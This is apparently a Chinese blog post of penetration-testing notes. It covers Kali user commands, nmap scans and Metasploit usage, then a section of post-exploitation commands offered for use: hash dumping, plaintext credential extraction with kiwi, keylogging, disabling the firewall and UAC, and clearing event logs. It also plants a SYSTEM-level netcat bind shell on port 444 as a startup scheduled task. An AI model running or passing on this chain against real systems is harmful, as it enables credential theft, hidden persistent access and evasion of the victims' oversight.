大家好,今天我将分享一些在Kali Linux中进行安全测试的实用技巧。以下是我在学习过程中整理的一些操作步骤和心得。
一、用户切换与密码修改
-
su [username]:切换到其他用户 命令示例:
su john
(切换到用户john) -
passwd [username]:更改用户密码 命令示例:
passwd john
(更改用户john的密码)
二、网络扫描
- nmap:网络扫描工具 命令示例:
nmap 192.168.1.0/24
(扫描192.168.1.0/24网段)- TCP全开扫描:
nmap -sT 192.168.1.1
- SYN半开扫描:
nmap -sS 192.168.1.1
- Version扫描:
nmap -sV 192.168.1.1
- TCP全开扫描:
三、Metasploit利用
-
msfconsole:进入Metasploit框架 命令示例:
msfconsole
-
查找并使用脚本
- 查找脚本:
search name
- 使用脚本:
use name
- 查看脚本参数:
show options
- 设置参数:
set option-name value
- 运行脚本:
run
- 查找脚本:
-
退出Metasploit
- 退出框架:
quit
- 退出脚本:
back
- 退出框架:
4.Meterpreter命令
- 获取当前用户:
getuid
- 获取哈希后的系统用户信息:
hashdump
- 加载kiwi模块:
load kiwi
- 读取系统账户信息明文:
creds_all
- 进程迁移:
migrate [pid]
- 开启键盘记录:
run post/windows/capture/keylog_recorder
四、增加防火墙规则与植入后门
-
进入Windows Shell并处理乱码
- 进入Shell:
shell
- 处理乱码:
chcp 65001
- 进入Shell:
-
防火墙操作
- 开启/关闭防火墙:
netsh advfirewall set allprofiles state off/on
- 添加入站规则:
netsh firewall add portopening tcp 444 name enable all
- 开启/关闭防火墙:
-
修改注册表以禁用UAC
- 命令示例:
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
- 命令示例:
-
清除日志
- 命令示例:
clearev
- 命令示例:
-
植入后门
- 上传文件:
upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
- 创建计划任务:
schtasks /create /tn "nc" /ru system /tr "c:\windows\system32\nc.exe -Ldp 444 -e cmd.exe" /sc onstart
- 上传文件:
五、DoS攻击与防护
-
CVE-2015-1635防护
- 关闭IIS缓存
- 安装补丁
-
MS编号与CVE编号
- MS编号:微软漏洞命名方式,如MS08-027
- CVE编号:通用漏洞披露,如CVE-2015-1635
总结:
通过本文,我们学习了在Kali Linux中进行用户切换、密码修改、网络扫描以及使用Metasploit框架进行安全测试的方法。这些技能对于安全测试人员来说至关重要。在实际操作中,请确保遵守法律法规,不要进行未授权的测试。
如有疑问,欢迎在评论区留言交流。谢谢阅读